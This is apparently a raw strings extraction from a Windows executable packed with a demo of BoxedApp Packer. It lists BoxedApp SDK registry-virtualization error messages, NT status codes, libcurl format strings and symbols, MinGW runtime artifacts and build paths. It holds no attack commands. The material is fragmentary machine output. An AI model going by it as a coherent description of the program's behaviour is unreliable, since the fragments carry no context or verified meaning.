STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
RegOpenKeyExW
RegOpenKeyW
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
.data
.edata
.idata
libgcj_s.dll
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
%c%c==
%c%c%c=
%c%c%c%c
%s:%d
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
timeout on name lookup is not supported
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
p.jpg
p.jpeg
p.txt
p.html
p.xml
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %lld
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
Avoided giant realloc for header (max is %d)!
HTTP/
The requested URL returned error: %d
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
%sAuthorization: Basic %s
%s auth using %s with user '%s'
Referer: %s
Accept-Encoding: %s
%s, TE
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
ftp://
;type=%c
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
ftp://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
[%s %s %s]
Recv failure: %s
Send failure: %s
/etc/ssl/certs/ca-certificates.crt
IDN support not present, can't parse Unicode domains
Connected to %s (%s) port %ld (#%ld)
%5[^:@]:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Curl_addHandleToPipeline: length: %d
Closing connection %d
Connection #%ld to host %s left intact
Found bundle for host %s: %p
Server doesn't support pipelining
Connection %d seems to be dead!
[^:]:%[^
:]://%[^
 malformed
:%5[^@]
Protocol %s not supported or disabled in libcurl
%s://%s
Couldn't find host %s in the _netrc file; using defaults
ftp@example.com
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
zlib/%s
7.30.0
%%X
login
password
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
No URL set!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
operation aborted by callback
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
Internal error clearing splay node = %d
Internal error removing splay node = %d
Pipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Error while processing content unencoding: %s
1.2.8
1.2.0.4
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Please call curl_multi_perform() soon
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Curl_ipv4_resolve_r failed for %s
%d.%d.%d.%d
d:d:d
d:d
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
00000001
12345678
%s xxxxxxxxxxxxxxxx
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Server %s is blacklisted
Server %s is not blacklisted
Site %s:%d is pipeline blacklisted
Adding handle: send: %d
Adding handle: recv: %d
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
curl_easy_duphandle
curl_easy_escape
curl_easy_getinfo
curl_easy_pause
curl_easy_recv
curl_easy_send
curl_easy_strerror
curl_easy_unescape
curl_escape
curl_formadd
curl_formfree
curl_formget
curl_free
curl_getdate
curl_getenv
curl_global_cleanup
curl_global_init_mem
curl_maprintf
curl_mfprintf
curl_mprintf
curl_msnprintf
curl_msprintf
curl_multi_add_handle
curl_multi_assign
curl_multi_cleanup
curl_multi_fdset
curl_multi_info_read
curl_multi_init
curl_multi_perform
curl_multi_remove_handle
curl_multi_setopt
curl_multi_socket
curl_multi_socket_action
curl_multi_socket_all
curl_multi_strerror
curl_multi_timeout
curl_multi_wait
curl_mvaprintf
curl_mvfprintf
curl_mvprintf
curl_mvsnprintf
curl_mvsprintf
curl_share_cleanup
curl_share_init
curl_share_setopt
curl_share_strerror
curl_strequal
curl_strnequal
curl_unescape
curl_version_info
ADVAPI32.DLL
WS2_32.DLL
zlib1.dll
DllMainCRTStartup
GNU C 4.2.1-sjlj (mingw32-2)
/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.c
 DllMainCRTStartup@12
dllcrt1.c
.file
http.c
ftp.c
url.c
_Curl_do
curl_fnmatch.c
ftplistparser.c
http_chunks.c
http_digest.c
curl_rand.c
http_negotiate.c
tftp.c
ssh.c
curl_addrinfo.c
curl_sspi.c
curl_memrchr.c
smtp.c
curl_threads.c
curl_rtmp.c
curl_gethostname.c
http_proxy.c
curl_gssapi.c
curl_ntlm.c
curl_ntlm_wb.c
curl_ntlm_core.c
curl_ntlm_msgs.c
curl_sasl.c
curl_schannel.c
curl_multibyte.c
curl_darwinssl.c
pipeline.c
.idata$2
.idata$4
.idata$5
.idata$6
.idata$7
.debug_aranges
.debug_pubnames
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_loc
_DllMainCRTStartup@12
_curlx_tvdiff
_curlx_tvdiff_secs
_Curl_tvlong
_curlx_tvnow
_Curl_base64_encode
_Curl_base64_decode
_Curl_num_addresses
_Curl_resolv_unlock
_Curl_hostcache_clean
_Curl_hostcache_destroy
_Curl_mk_dnscache
_Curl_hostcache_prune
_Curl_cache_addr
_Curl_loadhostpairs
_Curl_resolv
_Curl_resolv_timeout
_Curl_printable_address
_Curl_global_host_cache_dtor
_Curl_global_host_cache_init
_Curl_pgrsSetDownloadCounter
_Curl_pgrsSetUploadCounter
_Curl_pgrsSetDownloadSize
_Curl_pgrsSetUploadSize
_Curl_pgrsResetTimesSizes
_Curl_pgrsStartNow
_Curl_pgrsUpdate
_Curl_pgrsDone
_Curl_pgrsTime
_Curl_formclean
_curl_formfree
_Curl_FormInit
_Curl_formpostheader
_Curl_FormReader
_Curl_getformdata
_curl_formget
_curl_formadd
_Curl_cookie_freelist
_Curl_cookie_clearall
_Curl_cookie_clearsess
_Curl_cookie_cleanup
_Curl_cookie_list
_Curl_cookie_getlist
_Curl_cookie_add
_Curl_cookie_init
_Curl_cookie_loadfiles
_Curl_flush_cookies
_http_should_fail
_Curl_add_buffer_init
_http_getsock_do
_use_http_1_1
_Curl_add_buffer
_checkhttpprefix
_Curl_checkheaders
_Curl_compareheader
_http_perhapsrewind
_Curl_http_auth_act
_Curl_http_done
_Curl_http_connect
_Curl_add_bufferf
_Curl_add_timecondition
_Curl_add_custom_headers
_Curl_add_buffer_send
_Curl_http_input_auth
_Curl_http_output_auth
_Curl_http
_Curl_http_readwrite_headers
_Curl_write
_Curl_debug
_Curl_read
_Curl_read_plain
_Curl_sendf
_Curl_failf
_Curl_client_write
_Curl_recv_plain
_Curl_send_plain
_Curl_write_plain
_Curl_infof
_Curl_freeset
_Curl_init_userdefined
_Curl_protocol_getsock
_Curl_doing_getsock
_Curl_protocol_connecting
_Curl_protocol_doing
_Curl_reset_reqproto
_Curl_do_more
_Curl_verboseconnect
_Curl_isPipeliningEnabled
_IsPipeliningPossible
_parse_remote_port
_Curl_open
_Curl_protocol_connect
_Curl_connected_proxy
_Curl_setup_conn
_Curl_removeHandleFromPipeline
_Curl_getoff_all_pipelines
_Curl_addHandleToPipeline
_signalPipeClose
_Curl_disconnect
_Curl_done
_Curl_handler_dummy
_Curl_connect
_Curl_setopt
_Curl_close
_Curl_dupset
_Curl_if_is_interface_name
_Curl_if2ip
_Curl_speedcheck
_Curl_speedinit
_curl_version_info
_curl_version
_curl_getenv
_curl_free
_Curl_urldecode
_curl_easy_unescape
_curl_unescape
_curl_easy_escape
_curl_escape
_curl_msnprintf
_curl_mvfprintf
_curl_mvprintf
_curl_mvsprintf
_curl_mfprintf
_curl_mprintf
_curl_msprintf
_curl_mvaprintf
_curl_maprintf
_curl_mvsnprintf
_Curl_parsenetrc
_Curl_initinfo
_Curl_getinfo
_Curl_single_getsock
_Curl_sleep_time
_Curl_posttransfer
_strlen_url
_strcpy_url
_Curl_setup_transfer
_Curl_meets_timecondition
_Curl_reconnect_request
_Curl_follow
_Curl_pretransfer
_Curl_readrewind
_Curl_retry_request
_Curl_fillreadbuffer
_Curl_readwrite
_curl_strnequal
_curl_strequal
_Curl_easy_addmulti
_curl_easy_send
_curl_easy_recv
_curl_easy_pause
_Curl_easy_initHandleData
_curl_easy_reset
_curl_easy_duphandle
_curl_easy_getinfo
_curl_easy_cleanup
_curl_easy_perform
_curl_easy_setopt
_curl_global_cleanup
_curl_global_init
_curl_easy_init
_curl_global_init_mem
_Curl_fnmatch
_Curl_fileinfo_dtor
_Curl_fileinfo_alloc
_Curl_wildcard_dtor
_Curl_wildcard_init
_Curl_httpchunk_init
_Curl_httpchunk_read
_Curl_strtok_r
_Curl_persistconninfo
_Curl_socket
_Curl_closesocket
_Curl_getconnectinfo
_Curl_timeleft
_Curl_sndbufset
_Curl_connecthost
_Curl_updateconninfo
_Curl_is_connected
_Curl_llist_alloc
_Curl_llist_insert_next
_Curl_llist_remove
_Curl_llist_destroy
_Curl_llist_count
_Curl_llist_move
_Curl_hash_pick
_Curl_hash_str
_Curl_hash_start_iterate
_Curl_hash_next_element
_Curl_str_key_compare
_Curl_hash_clean_with_criterium
_Curl_hash_delete
_Curl_hash_clean
_Curl_hash_destroy
_Curl_hash_add
_Curl_hash_init
_Curl_hash_alloc
_fd_key_compare
_multi_freeamsg
_Curl_multi_pipeline_enabled
_Curl_multi_handlePipeBreak
_Curl_multi_set_easy_connection
_Curl_multi_max_host_connections
_Curl_multi_max_total_connections
_Curl_multi_max_pipeline_length
_Curl_multi_content_length_penalty_size
_Curl_multi_chunk_length_penalty_size
_Curl_multi_pipelining_site_bl
_Curl_multi_pipelining_server_bl
_curl_multi_assign
_Curl_expire
_Curl_multi_process_pending_handles
_curl_multi_timeout
_curl_multi_fdset
_curl_multi_setopt
_curl_multi_info_read
_curl_multi_cleanup
_curl_multi_perform
_curl_multi_socket_all
_curl_multi_socket_action
_curl_multi_socket
_curl_multi_wait
_curl_multi_remove_handle
_curl_multi_add_handle
_curl_multi_init
_Curl_unencode_cleanup
_Curl_unencode_gzip_write
_Curl_unencode_deflate_write
_curl_share_init
_Curl_share_lock
_Curl_share_unlock
_curl_share_cleanup
_curl_share_setopt
_Curl_digest_cleanup
_Curl_output_digest
_Curl_input_digest
_Curl_MD5_init
_Curl_MD5_update
_Curl_MD5_final
_Curl_md5it
_Curl_rand
_Curl_srand
_Curl_inet_pton
_curl_easy_strerror
_curl_multi_strerror
_curl_share_strerror
_Curl_strerror
_Curl_ipvalid
_Curl_ipv4_resolve_r
_Curl_getaddrinfo
_Curl_set_dns_servers
_Curl_inet_ntop
_Curl_gmtime
_curl_getdate
_Curl_wait_ms
_Curl_poll
_Curl_socket_check
_Curl_clone_ssl_config
_Curl_free_ssl_config
_Curl_ssl_config_matches
_Curl_splay
_Curl_splayinsert
_KEY_NOTUSED.17658
_Curl_splaygetbest
_Curl_splayremovebyaddr
_Curl_blockread_all
_Curl_SOCKS5
_Curl_SOCKS4
_Curl_raw_toupper
_Curl_raw_equal
_Curl_raw_nequal
_Curl_strntoupper
_Curl_freeaddrinfo
_Curl_he2ai
_Curl_ip2addr
_Curl_str2addr
_curl_slist_append
_curl_slist_free_all
_Curl_slist_duplicate
_curlx_nonblock
_Curl_memrchr
_curlx_ultous
_curlx_ultouc
_curlx_ultosi
_curlx_uztosi
_curlx_uztoul
_curlx_uztoui
_curlx_sltosi
_curlx_sltoui
_curlx_sltous
_curlx_uztosz
_curlx_sotouz
_curlx_sztosi
_curlx_sitouz
_curlx_sktosi
_curlx_sitosk
_Curl_HMAC_init
_Curl_HMAC_update
_Curl_HMAC_final
_Curl_gethostname
http_negotiate_sspi.c
_Curl_proxyCONNECT
_Curl_proxy_connect
_Curl_sasl_cleanup
_Curl_sasl_create_login_message
_sasl_digest_get_key_value
_Curl_sasl_create_digest_md5_message
_Curl_sasl_create_cram_md5_message
_Curl_sasl_create_plain_message
_Curl_bundle_remove_conn
_Curl_bundle_add_conn
_Curl_bundle_destroy
_Curl_bundle_create
_Curl_conncache_find_first_connection
_Curl_conncache_foreach
_Curl_conncache_remove_conn
_Curl_conncache_find_bundle
_Curl_conncache_add_conn
_Curl_conncache_destroy
_Curl_conncache_init
_print_pipeline
_Curl_pipeline_set_server_blacklist
_Curl_pipeline_server_blacklisted
_Curl_pipeline_set_site_blacklist
_Curl_pipeline_site_blacklisted
_Curl_move_handle_from_send_to_recv_pipe
_Curl_add_handle_to_pipeline
_Curl_pipeline_penalized
.weak.__Jv_RegisterClasses.___gcc_register_frame
__libmsvcrt_a_iname
_Curl_handler_http
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
_Curl_crealloc
_Curl_cfree
_Curl_HMAC_MD5
_Curl_wkday
___crt_xp_start__
_Curl_handler_file
___crt_xp_end__
__head_libmsvcrt_a
_Curl_ccalloc
___crt_xc_end__
___crt_xc_start__
_Curl_DIGEST_MD5
_Curl_cmalloc
_Curl_month
_Curl_cstrdup
___crt_xt_start__
_Curl_cwcsdup
___crt_xt_end__
_Curl_ack_eintr
.data
.bss
libgcc_s_dw2-1.dll
\QUSEREX.DLL
pthread_key_create
pthread_key_delete
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/dllcrt1.c
C:\MinGW\msys\1.0\src\mingwrt
-DllMainCRTStartup@12
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
cygming-crtbegin.c
.tls$AAA
.tls$ZZZ
.CRT$XLA
.CRT$XLZ
.CRT$XLC
.CRT$XLD
.CRT$XDA
.CRT$XDZ
.idata$6
cygming-crtend.c
__CRT_MT
.eh_frame
.debug_pubtypes
.debug_str
.debug_ranges
_pthread_key_create
_pthread_key_delete
_ptw32_processTerminate.part.1
_pthread_join
___report_error
___mingwthr_run_key_dtors
_key_dtor_list
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
.text.startup
.ctors.65535
.weak.___register_frame_info.___gcc_register_frame
_ptw32_selfThreadKey
_ptw32_cleanupKey
.weak.___deregister_frame_info.___gcc_register_frame
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
This EXE is created by the demo version of BoxedApp Packer
Visit our web-site at: http://boxedapp.com/boxedapppacker/order.html
WBoxedAppLog_%d.txt
BoxedAppVar:ExeFileName
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFullPath
BoxedAppVar:OldCmdLine
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_USERS
%s\%s
%s\winsxs\tempBxDir\virtualAsm
:\tempManifest.manifest
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
